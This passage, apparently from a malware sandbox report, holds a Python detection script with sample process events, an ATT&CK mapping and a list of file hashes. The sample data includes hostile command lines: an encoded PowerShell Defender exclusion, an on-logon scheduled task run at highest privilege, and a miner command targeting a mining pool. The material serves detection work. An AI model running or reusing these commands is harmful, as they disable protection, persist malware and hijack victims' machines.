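       "RQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQ"
       "AHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAA"
       "PAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaABzACMAPgA=")

# Constructed Sysmon-style records (pid, image, cmdline, parent); the last one
# is a benign-looking query that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(4652, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "' + ENC + '"',
              r"C:\Users\Admin\Desktop\munchenlatest.exe"),
    ProcEvent(1516, r"C:\Windows\system32\schtasks.exe",
              r'schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(2728, r"C:\Windows\explorer.exe",
              r'C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --randomx-mode=auto '
              r'--url=xmr-eu1.nanopool.org:14433 --cpu-max-threads-hint=60 --tls --cinit-stealth',
              r"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"),
    ProcEvent(4384, r"C:\Users\Admin\AppData\Local\Temp\rundii32.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\rundii32.exe"', r"C:\Users\Admin\Desktop\munchenlatest.exe"),
    ProcEvent(2976, r"C:\Windows\System32\Wbem\WMIC.exe", "wmic csproduct get uuid", r"C:\Windows\system32\cmd.exe"),
    ProcEvent(5376, r"C:\Windows\System32\Wbem\WMIC.exe", "wmic os get Caption", r"C:\Windows\system32\cmd.exe"),
]

ENC_RE = re.compile(r'-e(?:c|nc|ncodedcommand)?\s+"?([A-Za-z0-9+/=]{16,})', re.I)
BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.S)
WINDOWS_DIR = "c:\\windows\\"
# Genuine Windows binary names that the dropped files copy or imitate
# (rundii32 for rundll32, sihost64 for sihost, services64 for services).
SYSTEM_NAMES = ("rundll32.exe", "splwow64.exe", "sihost.exe", "services.exe",
                "conhost.exe", "explorer.exe")
# Switches seen on the explorer.exe command line in the tree (XMRig style).
MINER_FLAGS = ("--algo=", "--url=", "--randomx-", "--cinit-",
               "--cpu-max-threads-hint", "--tls")
# Hardware/licence fingerprinting queries run through cmd.exe in the tree.
FINGERPRINT_MARKERS = ("csproduct get uuid", "win32_videocontroller",
                       "processor_identifier", "backupproductkeydefault")

def decode_encoded_command(cmdline):
    """Return the script behind -e/-ec/-enc/-EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def strip_block_comments(script):
    """Remove <# ... #> junk comments and collapse the whitespace they leave."""
    return " ".join(BLOCK_COMMENT_RE.sub("", script).split())

def looks_like_system_binary(image):
    """True for a file name that is (or nearly is) a Windows binary name but lives outside the Windows directory."""
    if image.lower().startswith(WINDOWS_DIR):
        return False
    name = image.lower().rsplit("\\", 1)[-1]
    return any(difflib.SequenceMatcher(None, name, k).ratio() >= 0.8 for k in SYSTEM_NAMES)

def detect(ev):
    """Rule names tripped by one process-creation record, in a fixed order."""
    hits, cl = [], ev.cmdline.lower()
    script = decode_encoded_command(ev.cmdline)
    if script is not None:
        if BLOCK_COMMENT_RE.search(script):
            hits.append("encoded_powershell_with_comment_junk")
        if re.search(r"add-mppreference\s+-exclusionpath", strip_block_comments(script), re.I):
            hits.append("defender_exclusion_added")
    if "schtasks" in cl and "/create" in cl and "/rl highest" in cl and re.search(r'/tr\s+"?c:\\users\\', cl):
        hits.append("onlogon_task_highest_rl_from_user_path")
    if sum(flag in cl for flag in MINER_FLAGS) >= 2:
        hits.append("xmrig_style_miner_cmdline")
    if any(marker in cl for marker in FINGERPRINT_MARKERS):
        hits.append("hardware_fingerprint_query")
    if looks_like_system_binary(ev.image):
        hits.append("system_binary_lookalike_outside_windows")
    return hits

def scan(events):
    """pid -> rule hits for every record that trips at least one rule."""
    findings = {}
    for ev in events:
        hits = detect(ev)
        if hits:
            findings[ev.pid] = hits
    return findings

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(hits))
```

The rules key on behaviour rather than on the hashes in the Downloads list, so they survive a rebuild of the dropper. The decode step strips the `<# #>` comments before matching, because that is exactly what the junk is there to defeat; the lookalike check compares file names rather than paths, since every masquerading binary in this run sits under C:\Users while the real ones it imitates live under C:\Windows.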
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Persistence
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Privilege Escalation
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Defense Evasion
  Hide Artifacts (1)
    Hidden Files and Directories (1)
  Obfuscated Files or Information (1)
    Command Obfuscation (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (3)
    Credentials In Files (3)
Downloads
-
Filesize 411KB
MD5 180c04a828909e35bf3d461c0eb827cc
SHA1 e692112d425fc5b6adc5c7bfa1e66757bb8f8c11
SHA256 c7b5bccc8f1089f9ea3f5fb3a6dd2843bd27c2994a59d770fd4a81cc472e499b
SHA512 6dda55954d148efad2615d26a85eebef3e3ab86de484a713b1c21e4c446b652aa8ccdc7a9c49e82110632019ad87a8365a418df2e0091bcc5235a1c0f240ea04
-
Filesize 79KB
MD5 79440f6d81fdf83469a8b3167f654461
SHA1 f6cbbcaa10ff39668d44fc59f2bef06d192ddd95
SHA256 48e1ca7b0e4554b35a0d965c1edb1b1fa152caaa6b68dd71df1029155e2d123f
SHA512 ef3aee9569bbc047eb239121ee1783a1ed626570a157dba179124e8c68a1bad481be54c581427b8d7dc5fc058f0a6df9a4e9aa9ca2ee52d82378d823ddfe0af7
-
Filesize 95KB
MD5 f34eb034aa4a9735218686590cba2e8b
SHA1 2bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA256 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512 d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af
-
Filesize 58KB
MD5 31859b9a99a29127c4236968b87dbcbb
SHA1 29b4ee82aa026c10fe8a4f43b40cbd8ec7ea71e5
SHA256 644712c3475be7f02c2493d75e6a831372d01243aca61aa8a1418f57e6d0b713
SHA512 fec3ab9ce032e02c432d714de0d764aab83917129a5e6eeca21526b03176da68da08024d676bc0032200b2d2652e6d442ca2f1ef710a7408bd198995883a943a
-
Filesize 10KB
MD5 6746e9cbc897101fd8ca22e42490614f
SHA1 3d732b58411eb6f4ad624bc9c7c5243315466ed3
SHA256 81310fd7aaf3a8a280e6efddecd5a682c871fc6f5595a3ba131c9e60b58c80e1
SHA512 2d9e059c9f924030d119e42de65e7488dfb87459d732391c674448e63e3a10b75b0886e0eedfdcab86dbb14c987cf6d1a0d276a9bc7571fcb0cfd8ff0c9157d5
-
Filesize 10KB
MD5 50ccec6aa3033c421ec34a17625bdc08
SHA1 abce26f3702e8f3d833f2e35adc8bc42d95354d6
SHA256 0d9125cc84892ef961f33f316139e027095e325d540a98d5cd8099633d31b368
SHA512 633ca161419f6dd990750a6f674a7cc8436b43c1c5ee02699bb0935ee030434f76a773dfe8f1c9b01e15c507ba8f1de4768a1829c239a34bfedee2b5226fbaf2
-
Filesize 10KB
MD5 ae0f85a63ada456eeaf94b846fe8bd26
SHA1 621625b9913b257eb8fa39aa0637adb6737394fe
SHA256 305ce445fa2e3bbd9aca3f1a31ca8c805daec293cc79bcd20b39ea5ae5b9989d
SHA512 059d8de197387c761f2ea0066892e47722fc56fd274e4eff181e1192223d0c6ba8230b4d5f656cfec426dbd715c0e0acbef91681c462b2be6928f56ea7aaa267
-
Filesize 10KB
MD5 4fc7b688f541c78df18402f7e3256929
SHA1 b431cecc0dd87ef4b4d3154b3ed6ff3b5c2eb0cd
SHA256 6e6c39c29890949d9857190c608ba8e4a195b8dc656d8616322e27a9d268fa49
SHA512 3d082b60af05566b9bc0135dbc5b9a9ccd9ba0aac07522a63ef15739f83b5b43f0c432274b15c29e00d4cd18e85d6c1673f7bfd872f57319c7b490db3ed69fdb
-
Filesize 13KB
MD5 ca2c182a0d46f7f614cbb61d3e9555c5
SHA1 04713c5ff488e17c151bfca1c540c495783c6e4a
SHA256 34b41b7160bf5fe3d46b95f51399de8666c5ab32b064e7d57d7771fd51aa0ce2
SHA512 7b1a994b8681921d308e8ebb62f47e705807c4eaeb7b6b25517b633b4bb324865a0987d4f4f3e8c166973ad5c8d8dce8ec83aafe20de8194c0ad8a64565b703f
-
Filesize 10KB
MD5 4e7b40f3c457212792ed796d5ceb7c0f
SHA1 dedb78bbcc0ae5e5ab1cb15eec15e4f3300bc32e
SHA256 11f046a0bd6ea6bbae9355e7b3f6ca42adae2a5c7f41f30fcb497baec80d69ad
SHA512 3f8fd4171d48cf8f9a37fad1b42d79bb9b8cf8c08d0e594aebc6425c1b5d981db542a4a57bf71d5fd936641755c1c8548bc77ead99aff142da0da10e03b1c135
-
Filesize 10KB
MD5 80ab22c6d0250257b61b217822aa5d7c
SHA1 e659198c8045d918384e276783507d77ce297cd6
SHA256 d56b63aefedc21372a5d75918032e98f3e4c564733d4838a5b442351e32a300b
SHA512 94e61803a318fde919ba18a20cbdfae1250a844c2266311bc99cfcbb22757bd43b5279567f24bae32192dc0b9fbb0b20d10db3b3f19014708af7e8f89a1c96a4
-
Filesize 10KB
MD5 71cdf92988835da9a691482a6f06174f
SHA1 16f12bb281540a0de6c95120fc51dd0a068e28dd
SHA256 797f05fb447cdba1078acb66cb7bde7c908f0efba0bc3fd4a54b4daebffaf84b
SHA512 1987fbf26559e59894de2289792577b857f320809ab1720e799933528a8d082240556f63d2f4c16907b45f6da10a7e04dac8bb953f036f0ebe822c7d13b1bb8c
-
Filesize 10KB
MD5 e58baf7e437354716be8bff0495f9bfe
SHA1 e873e3d8d422f62cabe7040517e561e31862278c
SHA256 6dee9c5652e2858fbfdd50c5175127108d227b7e90f575b2e6c33f1c8f5a0976
SHA512 2b7f122b48dbc7304118653e371ed99b45b203251a6dca2387311c4c70562121132bf2e00fa8d1b953583f2ca878602c2a1625f3bf3782112fd2619ba1ff25f8
-
Filesize 10KB
MD5 cedb4d3397a2c134fec77753f880d025
SHA1 173f8841d20ef214c197eb4bab0a0d1e0cb6bebd
SHA256 433b60ea4523c5733da468703d14ab8dcce42ef5f2417f9cde2fea3d3c3c977c
SHA512 6df040faa43172f14e65d1a2311d5ab66cee250e12596e901a2d7cd8144a3738e8e486545ad760a254ed278f4d35f68e1dcefaf77bf581858b2070768d1bc18d
-
Filesize 11KB
MD5 650ecbe45be7506075f93351bb0389f5
SHA1 4c33717c81500c72d4d7e9963b3c9043b8441a3f
SHA256 406e80902211d987ef0260d9db08821460e0702e90ae47165a727e0ca6b7c325
SHA512 63696d75015f2ed5c04883111aeae7eb594ff9fbc83f9b9399ccfd8186b9a5c52e4656005ef2c540091f82f7687745a209da79d12aa944a1d12b64547c31f342
-
Filesize 12KB
MD5 7859eb82f99fa849ad33909cdae8d493
SHA1 b56512906e9642a99dcb7eb7373fa8ad5990019e
SHA256 7c7a3c0d04519d1656a50604b1052850e9d937b6c3e973d564a6b2f9495ae05f
SHA512 a6548d6d70e8c22638d0619b4eaafead5289953c013d2e95477fb34316b788cd756217426dd36582b49ba5fd93702c4ec4590cabbe47d79156516fff5fcdb149
-
Filesize 10KB
MD5 273fdaa82afae0337f7f04ff9936afa3
SHA1 dd0ef3117be0d59ee13051346708b3008b1149c6
SHA256 9becf626ccabbcfc9a7b779026644606ec565b08cc9b85d3af09ab5189e8c6f9
SHA512 b19b2998bb197b741d878f0a25e75abea0f05033f20b17003bf8eed983ca35a90918fc4bb399d6c7150c8be8cb5a428e4f2fe804f1aae5a32f0a363604bc1fd7
-
Filesize 10KB
MD5 bbee8d15501d1fe036fdac6c032c4380
SHA1 a8be3ab44d754498405ffabd39f77fc829bad3c6
SHA256 c26aae1fe2c56eb26ed1af5bb7cca7cea762e126f4c2e06b6ab39d75a8cb4482
SHA512 9851d4bc159a5b21e281c591c001245ced0455adf2c419977490546cbf452d405a34152a2df645a344aa50f45c2caff383e43a75e062c3478aba713868fbe2d1
-
Filesize 11KB
MD5 9dd8cc2363db5f39ea3b6fc28dbb5695
SHA1 33c49373c772c0c7ec71983158213569cf572ee2
SHA256 173bbf24f7420db3d1e53e45dd0179b9b152bc6d08f3d46eb9d47a833a46cb0a
SHA512 946d4acde2773332405e1c4c0bf427f0cbde4ee42e72acac7039a482a62dd99f033c526428f42b63a2aca5db1eea0e6b45063d1e2de044ee8201ab829d884523
-
Filesize 12KB
MD5 b6ef15e2cff6a7de8db778da9e845c55
SHA1 8062e8b2a02f9e0ad346bcc5ed8263fd61f17b4b
SHA256 c1ed94eade0309c4c4f0854f5a972bf76d55393857e45c770e217a996103aa62
SHA512 50a8267aab8819eac91e81bdcad64585b926dad0b41db46677b2214e68e3046bba0a9af33eb86c310e9bb2c8b4a04a12c6a70a772540072c7fc815a293a00c3e
-
Filesize 10KB
MD5 54d6888e154d8fd2b35c7a7b8dcaa84b
SHA1 883cca38ff0d43ab86b344ec7a490515f594a060
SHA256 9e2744bc1f7fa7015881c5edc7f14b031472ca1a08c57c38325cbf7736890be0
SHA512 0b2f048b2b5f1083d8e65ddb3278a4340eab05e41d9a08b4337f4cdf6b5afe540cda6c3b87462a2de3bb9ff2fc2ab6d95631913c6e1e02335a42812d7ef681dd
-
Filesize 9KB
MD5 93ad9b6d88b931d7c1672ae0af2d9dac
SHA1 8aa5583b42555a8706fd05b2211c1b6cd1c51c2b
SHA256 5ef9cd62cf2a2b0cb068126d9c680016c9e1f3b738a284325b9796c86af06594
SHA512 b04d553a719388347409047756db2ecbe58b2f4e08fa5bb4544725c1342c7e795267ab6493fca1a850eecaeb9c7a1779f874ce0367dcefa1ab1cb79b14cd7b45
-
Filesize 10KB
MD5 93a2ea4844b8e80c1cff746c295553c7
SHA1 bd29d940b9c70ad7fd3b8645ca6d450c3392830a
SHA256 a50682fdd5a5ae9ceb02c7b9caffdce10e3b38178ebe3e74b6323627fc6d3a89
SHA512 0b95784543bf554d375c84721103f5a84aecc22d6d712df9713d6bd247258e5d6349a2ba9d92c7543d1303c91cfaf99d6d4f609b717db3bcd35f393a10d57d5e
-
Filesize 10KB
MD5 8e1b04d0e6ff7a3fc381f7306d6cf243
SHA1 a0a2794da5bfd59e7a7db03dd21aba9f10613623
SHA256 b4c44d1ee830c37ae96b90b0a119b4e137862f45314454a23b81fd3a2399a635
SHA512 1c45e2b37b9b648227b1af4d739e5d4f1979fa8796651a53d01d0a1cb871665115ded270b74e2abd9600a1c6157cfb0999c7958e69d188d9a420599d015bfb3d
-
Filesize 12KB
MD5 0bd7734587b455b3b0fe4ff1342d38a5
SHA1 dbafbba73d821a395c97281741ed8ecbdfd9711d
SHA256 3f554614aba0bf193d101495b88fb5e3e6abc8e8c1f45dcc8053265fbc6b0a8c
SHA512 24f58e431a3660d94d7b2180dcd218c787f2b7fce4285e933c5191a7397ded002459487552b360dce5b8e61f2b70184a9bbdc6f5afe2767e6876f49f31f14451
-
Filesize 10KB
MD5 c959ff1b1b733abd45125d6392a4f0fc
SHA1 3ce203f1e864e313ae0025acf776429a7d440150
SHA256 0c764d9856bbedd7ea95e3427790fdb0c3c270c1a97fa3e0d085d77bd684537d
SHA512 b71f6a4130ebb122506ecbd86ea5ddb73ab5bd6c6bac0caab9fff2e908b998a0cf8e45a95af14060186e114701141980192ad506a1365eaaa8364f6e649d0e88
-
Filesize 11KB
MD5 6c97c8a4e1231863a6f2638bf44fbe53
SHA1 265e0b59a4ff5b7011d477f9172925b008be728c
SHA256 dad6738302efa9875f8c929c6c375cf15942a2cd6205b42166cde543f59697fd
SHA512 f957695f43212057905e4898c8d77bf82219bd33de3877d337625f5064b794f1dd6d507a7ab167d6b73e6531f9e839bc4148e0c433b396abeb827167448a6f1f
-
Filesize 10KB
MD5 9ec9658795a82a6f689dbbf9b14d56a8
SHA1 90498e0259ec68959e0ca9b7dfb6e94f24a192e5
SHA256 e25a1056beef787a1857541714d3ced677bc29257ddb70643a3f332d7081e24b
SHA512 ddab3d638f6b685ecf438870b3b6f1d7dd56319ed4748cbca20d54863970ce1e4e5edac4b7df5b63712fa63b1214f9477360f6f1dc7ec28feb807d3a3eb6457a
-
Filesize 10KB
MD5 ded095a3ea12e19e8fa06b400f4da71c
SHA1 c0537be41395dc58c2050527a1302bcca385c819
SHA256 fcbc8a6d4fcfda1df56188c7415874ac6e163aa5669da8b4dc5817411c7499b0
SHA512 5e27db0972db7ec821db1000d7293bbad4c9253aeaec37114be767625f32102bdc98476b0e819c2598dbe9f67e54cdb6d67a2046971467febba93e447f62b338
-
Filesize 11KB
MD5 0b61c5aaf5794c40643856d3f84fd107
SHA1 88cd05a9d2c4ad3f928793e3d5479cf84eea088a
SHA256 8eb4ad287946765485ae35ca7fabb29844293412b01678d7c29d53688db80499
SHA512 78b22375796848e78f39495619dfb5a91da28f95b0a931effa7971265ed95663894ec55a8c2b249a326d9605d053c7c0abdd65f7d9a271fc803ac2fe2695411a
-
Filesize 14KB
MD5 e813f085bb974077fd1ff02f859c19ff
SHA1 bdca1e7ca980373cfe93e2c07eae4e5f14fa92f8
SHA256 9818a2278ce39e0ecffa9bd2502fed106f9f2c6acaf801fb7d7df80606abc2ab
SHA512 b3b4b0e749dd04e698a26a82e2daa21e91d50896a648310253d69feb33585fd91e9c54698e33e8b9843642c865123e60a1cfaf3f2af46827afd38cd87a1b3e85
-
Filesize 10KB
MD5 61d0f3d97c1a7af5314c39c80c838796
SHA1 06f7971574f67f34f61ff1a9a54b60221070d04b
SHA256 0bfca5c3f717d1373e3faf94dd3d010a6976ae2d57cb35a197c5bbac80724b10
SHA512 9651f768c448fbb878b7600cbd80c001b7d7ea7dbec04b4ec50a637939787591a484aafd7ea5c2e0c77447229970b3bf1b6175e552a9f2a1024272895ed04a75
-
Filesize 12KB
MD5 ef655e2df6aa03c6aa11679e1601cbd1
SHA1 435082a01784be95f473095e4f0499f5c8c1e6b1
SHA256 8ec445f97325160b291ca8046c1cba997067e42e4095f724bda9b43ae13bfed7
SHA512 3a1ef8c4bfe553de57d59dc2c2009e65e69a8dca914d8d2396495b888be0859e78508e4000a39a482c7116fadfe1b8d143b9aaa2c97785a0954afd8b8b81a23f
-
Filesize 11KB
MD5 6a32b4a457bc7eb515ed59dba1114897
SHA1 7a69af1660d76285183754c7d1b29d81968d3960
SHA256 da3fcc1283339ddd4504e48a63f75e4f8ac8f30ce48384e7c643b80b372bfcd6
SHA512 7c5968f24940e35eae221f6b17b44aef51f751d685d74e79aa247d5dfd95d8a8d3da3f7ce95a2c15764c5005be05fec22ec7a7c61617444acea353bf7931d19a
-
Filesize 10KB
MD5 3089adc12784121cdba1e6b550efd6c9
SHA1 eaa9b3760d7b25590cea4564d5dc81c86442d336
SHA256 25420d595989c800fe5f274aebf32e74f2e670e1d08bc5336ed67de9e1b1d62c
SHA512 62d8c2f07c8670e5135b8f092b533272c87e38191ceefe03c2e6e707fa71997a68b4e00d68020aa2cf3ef6e4de1d6c7a48f1eadcd409bf6c3889f635a1f89696
-
Filesize 19KB
MD5 8b0fe0eb8a838ea1524b9244679136ed
SHA1 a32b845db57f66845e9d5f428a871eecc8900e57
SHA256 8324e803620d6c7a57d644efb951b5b811d258f85195f71404198456d6a20da6
SHA512 a1861b8098855c1833e1e080df325ae1078ebb8918d658c7379f24f982560ab420d858be6c19353a79cbac6a4378bc23e7636f7fb7d517121cd82d924e8dcfc2
-
Filesize 11KB
MD5 1b686ce09c3d5b958b29065520a90c6f
SHA1 dda2b3316f1f2c557b09fe0b8557785dd8be847c
SHA256 201b8ed6e586afb1ae44ca4da8d4a923bcf87889a8dea0c0921f995839ec41c0
SHA512 68dc42abaecd78ce34ee0e130cc74d0932d3bf53994bd45a7f804bf3c3e59cf8125283efe67d7c12e34313401baf8a707ddb20a015fbfb9849b96870047edfe3
-
Filesize 14KB
MD5 5a04d702c462ac7b564f5da8bb35a2a0
SHA1 b8ed4c5710fb8c8ed81617c11b71b22cd57d5325
SHA256 0210604c8dd1e9aa8c2458e2734deff9d77897d7dfce42bc0f28ad62d265bd9b
SHA512 9986cb05ca1203c086e7d4f0c4a30c6c7394d6fc4ae3908b25867f387bf61a393b054c3a9e13ba9a0d103c5b1d4be874b81dc314be611457b3bd69113d91bd3c
-
Filesize 16KB
MD5 41ba9068fd432758ae08d80470cff8c8
SHA1 9de3cff0d99e3baef7ff1f45187c414c5a803a9f
SHA256 3c4f7104e8257b64b4a856c06dee4ab12e35a5b
dfe361b2fc4a04a564454010b
SHA512 1d50207493b3f3a3834ef09e4f78bb03d82f2760106842e7cb57742741a1182917f3e975244543e0cef63c16ebad147e3e8b16e18d14c63dc3c906670cee7545
-
Filesize 16KB
MD5 30a6e4b8fe2d9b2df594e809cbbac128
SHA1 f30559b281cb679bb406bfe42f1f501a376bca23
SHA256 f8bbf236334c083682cd710632005cb6a5a3b60086d05946827eb8ca45e24b8d
SHA512 337949c3b5a6e13ad3aae93294c5f97b6271f639e3296d4aab8ac546f4417c79c1906f92ab20955ca451d5317ba7fe64eed0c7a79309e337b20516283987c2e0
-
Filesize 12KB
MD5 9e4620c44403dfb42d3badd40ddef313
SHA1 0696df5c3f71aed9763408d2ab8ff8cbfd1d1a41
SHA256 5e2f92250a058802b4a72b93226616f390044c6bfe34a04b5533773806f7072e
SHA512 5b96b4775c5fae03ba0e96d2d0f5d2fb1b4bcb05014a47686b378e11659b53a518bb56acf0d3d076ec73eadb1b639c07a6be969bd68c34f3f3ca77451f160001
-
Filesize 10KB
MD5 bd9a3823f7eab3959c358c9a02c07424
SHA1 4c689623c353bffbd28c19a4b69dc85d5791b65e
SHA256 8e32928cab5e81b35b232754a5ccf78cc55d6bc8fe362a90ab6d5eab1fe8f5d9
SHA512 16b9cdf77d83da944b56772ac78dd8af6ef94976d1468b8a32d43419487c5b0f3ff3169fb29fdeada3f64d74b8900e7833728bf332f93809cb4a8c9cf42b7f62
-
Filesize 859KB
MD5 4c60bcc38288ed81c09957fc6b4cd7cd
SHA1 e7f08d71e567ea73bb30656953837314c8d715a7
SHA256 9d6f7b75918990ec9cd5820624130af309a2045119209bd90b4f70bc3abd3733
SHA512 856d97b81a2cb53dcba0136afa0782e0f3f81bea46f98e0247582b2e28870b837be3c03e87562b918ec6bc76469eecc2c22599238d191d3fba467f7031a2acaa
-
Filesize 79KB
MD5 1845bf494593b65462d2076206eb3643
SHA1 6fdd6209921c3af23492beffa4bd13aed33b24ef
SHA256 fcef03b181f1ebfdf58956ae4628417eecbb95b0c617ef099a0a818cc2863037
SHA512 8eac41e505557df9c503842634f55b1b9e77c6b7257106c27f0667359c82354fa1f63835d0971aa256fd0e3f155b81042bd4b5cf5c26c7cd03a1049c328d3a1b
-
Filesize 1.1MB
MD5 bbc1fcb5792f226c82e3e958948cb3c3
SHA1 4d25857bcf0651d90725d4fb8db03ccada6540c3
SHA256 9a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47
SHA512 3137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d
-
Filesize 23KB
MD5 6f818913fafe8e4df7fedc46131f201f
SHA1 bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA256 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA512 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639
-
Filesize 204KB
MD5 ad0a2b4286a43a0ef05f452667e656db
SHA1 a8835ca75768b5756aa2445ca33b16e18ceacb77
SHA256 2af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1
SHA512 cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4
-
Filesize 1.4MB
MD5 4a6afa2200b1918c413d511c5a3c041c
SHA1 39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3
SHA256 bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da
SHA512 dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20
-
Filesize 615KB
MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
-
Filesize 984KB
MD5 6914ef1fad4393589072e06a4630d255
SHA1 028669a97db7c007441ae3330767968544eba3c6
SHA256 81c9b5d54e1b1da192f4a167f7e06439e36c670a99af2f1ef056e0959e85de57
SHA512 b682c749d6f2ed56d69ff4f8520899638fa6f436b2af8241db686ccbc606d23d4e77721222ab7ad863336d5e5aafa1033b94f550198a1a083af5811ce8dec004
-
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize 6.5MB
MD5 1f2da62acedae32686c066546b569b04
SHA1 f83b6681ef62b74a5c973f0b8bd3c89aecfd11e3
SHA256 bd40d7b888d1f01c4e45040fe80e41a1d812d3ee3e932d84f7f3540ba936c5e9
SHA512 54bce8ec27fbb0ac6768e75f68af4e233d324ed59ec8bca19a1e738917389642e611a58a3231769eeb39a88f7e3e78cc17e09a109ab809a3bb195e1b34327bb9
-
Filesize 3.9MB
MD5 5580efca806a5b3b710df843b8145ba8
SHA1 3b39b13a928e2db51a2f7ac51f9f95fb28efb243
SHA256 b1f773d8c74a21bbf854665948d00b6c81414b6f0fee2e7e6e2fac194457603c
SHA512 ed40de310dca5803c0a87edd177bb4e747dfe847704e97fc0bbfa9f09fe306dcf25f9f5d0965cfd984c98aa9c2d0ee87c80cb73de487650b47d7f86064dd0d4b
-
Filesize 9.1MB
MD5 cac59c4e6752c4c2cecb29b5c2f9f9ac
SHA1 bf9ee5e449ce94c327d6743b62feca2c85a43841
SHA256 9d08b1a5c70870efecda2594ee777e4b18771eefb34d540109b1c45926fbf24c
SHA512 5b8aba311730202135afb4c03988f113801850e689954fbc004aa04a25d6cda8a2da2ecc63c476c620a6a2646c17241ef5780a42cb6001b1de30ec6379099431
-
Filesize 4.1MB
MD5 36480af45ff9d5931cb2f0a376c45f20
SHA1 fff9e5f7750de63e96aaba9fab2d98dbb205dfd6
SHA256 cb94a184404a7b0a188b31fca475f56b7cb1f7f42c2cacdfe3a00324d2291fd2
SHA512 38a0ae5bc3612eac050e714ec08de8c5ebb7508a20461d23fdf1a915570cac7f4e2abb4cdaedb913aca0904832ff7e5f66e60d563488b502606e866266d91cfa
-
Filesize 2.2MB
MD5 bfc16c7476c61d4b5a004ba97f5eccc3
SHA1 7a136debf77f394b0412d979c73e4f8af8587396
SHA256 1b343c5e48c01f376cc3887fa7000b0e69eb1894735c89b9c8d0ee1597893530
SHA512 3766067704a96a8bef769d907d39368ed3a25bba60af32b0087ae0a411c48735741af9a804926cae93eb86f520cfbbbbbd0ebb09242977d0f07179d1a6dba17e
-
Filesize 31KB
MD5 cfe1ab1913bbd166bca480eb4e5d1364
SHA1 a1e87dd6018f244966d875054330640f6e2d9c00
SHA256 db41aa5958994bce76ea6b86083cbf634760a5b1ccdeec9c2387ec6bc33915f6
SHA512 978a65def8eadc595d34752d54f76d8638bf133d09295e763f7b42a2bd342ed334fc0b1ae3680f0bff17f1899ecb42cf50e827dd4c91d4b16bdaadcdf41e3ae4
-
Filesize 9.1MB
MD5 752f04019d02e2cad7a089d3a1d5c814
SHA1 d452f4b7689def5d40fa476447b2c5801924e23e
SHA256 14aa5b0fb58dd616085d10d2b33707f1bb765c2e9e67ec5c2a050689a0206e01
SHA512 22270605de4bd8d80fc26e240b55f60deb3b9ac3974cbbaa37c2528175eb7979364e8b5a1bfa8614076797b0d7bd12a23508a53df1cffa39ff6cccda7422eac8